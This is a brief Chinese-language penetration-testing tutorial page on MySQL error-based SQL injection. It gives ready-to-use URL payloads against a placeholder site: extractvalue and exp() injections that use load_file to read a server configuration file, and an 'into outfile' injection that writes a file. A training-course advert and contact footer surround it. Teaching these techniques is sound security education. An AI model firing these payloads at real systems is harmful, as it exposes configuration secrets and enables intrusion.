1. 首页
  2. 渗透测试

[原创]WEB安全第四章SQL注入篇08 报错注入读取文件

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

WEB安全第四章SQL注入篇08 报错注入读取文件

上一课 给大家讲解了 mysql报错注入 其实他还有一些用法
例如读取文件
extractvalue 读取文件
http://target_sys.com/mysqlinj.php?id=-1 and (extractvalue(1,concat(0x7e,(select load_file(‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.php’)),0x7e)))
exp方法读取
http://target_sys.com/mysqlinj.php?id=1 and (exp(~(select*from(select load_file(‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.php’))a)));

[原创]WEB安全第四章SQL注入篇08 报错注入读取文件

写文件
http://target_sys.com/mysqlinj.php?id=-1 and exp(~(select*from(select ‘hello’)a)) into outfile ‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.txt’;
写文件默认就是只能写入0到文件里面 。

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/154.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息